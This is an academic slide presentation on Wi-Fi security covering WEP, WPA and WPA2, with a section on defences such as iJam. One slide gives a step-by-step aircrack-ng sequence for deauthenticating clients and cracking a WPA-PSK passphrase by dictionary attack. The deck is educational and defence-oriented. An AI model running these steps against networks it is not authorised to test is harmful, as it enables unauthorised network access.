Made by: Chetan Sakpal, Hend Nuhait, Travis Atkison Presented by: Chetan Sakpal


Nov 21, 2013


Outline

1) Objectives
2) Wireless Networks and Security
3) WEP and problems in WEP
4) WPA and problems in WPA
5) The Attack
6) Defense techniques
7) WPA2
8) Conclusion


Objectives


Study WPA.

Find a way to attack WPA.

Finally, find some techniques to defend against this attack.

Wireless Networks and Security

1) What are Wireless Networks?


A wireless network is the way that a computer is
connected to a router without a physical link.

2) Why do we need them?


Facilitates mobility


You can use lengthy wires instead,
but someone might trip over them.

3) Why security?


An attacker may hack a victim’s personal computer and steal his/her personal pictures and documents, or may perform illegal activities or crimes using the victim’s machine and ID.

Wireless Networks and Security

Three security approaches:

1. WEP (Wired Equivalent Privacy)
2. WPA (Wi-Fi Protected Access)
3. WPA2 (Wi-Fi Protected Access, Version 2)


Each has two generations named Enterprise and Personal.

WEP and its problems


Designed to provide the security of a wired LAN by encrypting traffic between the two sides of a data communication with the RC4 algorithm.

Problems:

1) The IV is short (24 bits) and is reused
2) Problem in the RC4 algorithm
3) Easy forging of authentication messages [1]

WPA


Enterprise WPA or Commercial WPA: Authentication is performed by an 802.1X authentication server, providing control and security for the users' traffic on the wireless network. No shared key.

Personal WPA or WPA-PSK (Pre-Shared Key): Avoids the authentication server; uses the encryption key only once, while initiating the session, using a 4-way authentication. [2]

Improvements:

1. A cryptographic message integrity code, or MIC, to defeat forgeries.
2. A new IV sequencing authority, which avoids replay attacks.
3. A per-packet key mixing function, to de-correlate the public IVs from weak keys.
4. A rekeying mechanism, to provide fresh encryption and integrity keys, undoing the threat of attacks stemming from key reuse. [2]

Problem


Attacking a WPA-PSK network is possible.

Tools like WPA cracker and Cowpatty are available.

Both perform a brute-force dictionary attack against WPA-PSK networks in an attempt to determine the shared passphrase. [2]

The Attack

1. airmon-ng
2. macchanger -s [Interface]
3. airodump-ng [The hacker’s station interface]
4. airodump-ng --bssid [MAC of Router] -w [FILENAME] -c [CHANNEL] [ADAPTER]
5. aireplay-ng -0 15 -a [MAC OF ROUTER] -c [MAC OF SYSTEM ON NETWORK] [ADAPTER]
6. aircrack-ng -e [ESSID - Name of network] -w [WORDLIST] [FILENAME.cap]

Defense


None of the attack methods is fast or effective when a longer passphrase is used.

Hide SSID

MAC filtering: maintain an access control list

Not allowing MAC de-authentication: Letter-envelope protocol [4]

Stop the attacker from acquiring client signals: iJam [5]

iJAM


The sender repeats its transmission. For each sample in these repeated transmissions, the receiver randomly jams either the sample in the original transmission or the corresponding sample in the repetition.

Since the eavesdropper does not know which signal sample is jammed and which one is clean, it cannot correctly decode data.

In contrast, the receiver knows which samples it jammed. Thus, the receiver can pick the correct samples from the signal and its repetition and rearrange them to get a clean signal, which it can decode.
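The repeat-and-jam mechanism described above, as an added simulation that is not part of the original slides or the iJam authors' code. It assumes a constructed, noise-free channel in which each sample is one bit, a jammed sample is overwritten with a random bit, and the eavesdropper guesses per sample which copy is clean, so it shows the mechanism rather than radio-level error rates; all function names are hypothetical.

```python
import random

def ijam_round(bits, rng):
    """One exchange: the sender repeats, the receiver jams one copy per sample."""
    original, repetition = list(bits), list(bits)
    # Receiver's secret choice per sample: 0 = jam original, 1 = jam repetition.
    jam_mask = [rng.randrange(2) for _ in bits]
    for i, which in enumerate(jam_mask):
        noise = rng.randrange(2)  # model assumption: jamming overwrites the sample
        if which == 0:
            original[i] = noise
        else:
            repetition[i] = noise
    return original, repetition, jam_mask

def receiver_decode(original, repetition, jam_mask):
    # The receiver knows its own mask and keeps the copy it did not jam.
    return [repetition[i] if m == 0 else original[i]
            for i, m in enumerate(jam_mask)]

def eavesdropper_decode(original, repetition, rng):
    # Without the mask, the eavesdropper is modelled as guessing per sample.
    return [original[i] if rng.randrange(2) == 0 else repetition[i]
            for i in range(len(original))]

def bit_error_rate(sent, decoded):
    return sum(a != b for a, b in zip(sent, decoded)) / len(sent)

def simulate(n_bits=4000, seed=1):
    """Return (receiver BER, eavesdropper BER) for constructed random data."""
    rng = random.Random(seed)
    sent = [rng.randrange(2) for _ in range(n_bits)]
    orig, rep, mask = ijam_round(sent, rng)
    rx = bit_error_rate(sent, receiver_decode(orig, rep, mask))
    eve = bit_error_rate(sent, eavesdropper_decode(orig, rep, rng))
    return rx, eve

if __name__ == "__main__":
    rx_ber, eve_ber = simulate()
    print(f"receiver BER={rx_ber:.3f}  eavesdropper BER={eve_ber:.3f}")
```
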

iJAM features

It can be used in conjunction with existing wireless security protocols (such as 802.11 WPA/WPA2) to secure the session key establishment phase by preventing an eavesdropper from overhearing the critical handshake packets.

The bit error rate at an eavesdropper ranges from 40-60%.

Jamming has no impact on packet decode ability at the intended receiver.

It is efficient.

Such a setup is already supported by various wireless hardware. [5]

WPA2


WPA2, like WPA, supports two modes of security, sometimes referred to as “home user” and “corporate.”

In “home user” mode a pre-shared secret is used, much like WEP or WPA.

Use of AES for encryption is a good choice.

The “corporate” security is based on 802.1X, the EAP authentication framework (including RADIUS), one of several EAP types (such as EAP-TLS, which provides a much stronger authentication system), and secure key distribution.

“Home user” security introduces the same security problems present in WEP and WPA-PSK. [3]

Conclusion


We show that WPA can also be attacked and we can
defend against such an attack by following the
approaches mentioned.

QUESTIONS?

References

1) Wired Equivalent Privacy (WEP) - Arash Habibi Lashkari, Farnaz Towhidi, Raheleh Sadat Hosseini - 2009

2) Wired Equivalent Privacy (WEP) versus Wi-Fi Protected Access (WPA) - Arash Habibi Lashkari, Masood Mansoori, Amir, Seyed Danesh - 2009

3) A Survey on Wireless Security protocols (WEP, WPA and WPA2/802.11i) - Arash Habibi Lashkari, Mir Mohammad Seyed Danesh, Behrang Samadi - 2009

4) A lightweight solution for defending against de-authentication / disassociation attacks on 802.11 networks - Thuc D. Nguyen, Duc H. M. Nguyen, Bao N. Tran, Hai Vu, Neeraj Mittal

5) iJam: Jamming Oneself for Secure Wireless Communication - Shyamnath Gollakota and Dina Katabi